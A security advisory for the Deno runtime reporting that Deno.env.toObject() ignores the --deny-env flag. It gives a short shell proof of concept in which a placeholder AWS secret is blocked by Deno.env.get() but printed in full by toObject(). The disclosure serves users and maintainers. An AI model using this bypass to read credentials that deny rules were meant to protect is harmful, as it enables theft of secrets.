GHSA-7w8p-chxq-2789: Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables

Summary

The Deno.env.toObject method ignores any variables listed in the --deny-env option of the deno run command. When looking at the documentation of the --deny-env option this might lead to a false impression that variables listed in the option are impossible to read.

PoC

export AWS_SECRET_ACCESS_KEY=my-secret-aws-key

# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
  --allow-env \
  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -

# All enviroment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
  --allow-env \
  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -

The first example using get exits with the following error:

error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
                     ^
    at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
    at file:///$deno$stdin.mts:1:22

The second example using toObject prints all environment variables:

[Object: null prototype] {
  ...
  AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
  ...
}

Impact

Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.

References

• GHSA-7w8p-chxq-2789
• denoland/deno#29079
• denoland/deno@2959e08
• denoland/deno@946ccda
• https://docs.deno.com/api/deno/~/Deno.Env.toObject
• https://docs.deno.com/runtime/fundamentals/security/#environment-variables